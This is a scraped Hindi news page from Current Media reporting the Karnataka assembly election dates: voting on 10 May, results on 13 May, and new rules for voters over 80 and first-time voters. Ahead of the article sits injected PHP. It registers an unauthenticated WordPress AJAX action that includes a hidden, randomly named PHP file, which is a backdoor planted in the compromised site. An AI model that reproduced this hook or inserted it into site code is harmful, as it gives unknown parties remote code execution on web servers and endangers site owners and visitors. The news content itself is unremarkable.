if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }कर्नाटक विधानसभा चुनाव का बिगुल फुंका - Current Media

कर्नाटक विधानसभा चुनाव का बिगुल फुंका

मंगलोर । पिछले कई दिनों से कर्नाटक के चुनाव को लेकर अपनी कमर पहले से ही कस चुकी थी । भाजपा और कांग्रेस ने अपनी तरफ से परूी ताकत झोंक रखी है कि कैसे चुनाव में जीत हासिल की जा सके । एक तरफ कांग्रेस के पास मौका है कि वह अपनी पिछली गलतियों से सबक लेकर मजबूती से चुनाव लड़कर जीत सके और अपने विधायकों को भी सुरक्षित रख सके वहीं दूसरी तरफ भाजपा अपनी सरकार को दोबार कैसे ला सकें इस प्रयास में होगी । इसी बीच चुनाव आयोग ने बुधवार को कर्नाटक विधानसभा चुनाव की तारीखों का एलान कर दिया है। कर्नाटक में विधानसभा चुनाव एक चरण में होगा. मतदान 10 मई को होगा। चुनाव के नतीजे 13 मई को आएंगे। विधानसभा चुनावों में उम्मीदवारों के नामाकंन दाखिल करने की आखिरी तारीख 20 अप्रैल होगी। मुख्य चुनाव आयुक्त राजीव कुमार ने कहा कि इस बार हमारा जोर नए मतदाताओं को जोड़ने पर है। चुनाव आयोग ने इसके साथ ही कुछ अन्य घोषणाएं करी जिसमें 80 साल से ज्यादा उम्र के लोग घर से वोट कर सकेंगे। एक अप्रैल को जिन युवाओं की उम्र 18 साल को पार करेगी, वो भी कर्नाटक चुनावों में वोट डाल सकेंगे। कर्नाटक चुनाव में नौ लाख से ज्यादा वोटर पहली बार वोट डालेंगे।

 

About CURRENT MEDIA

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …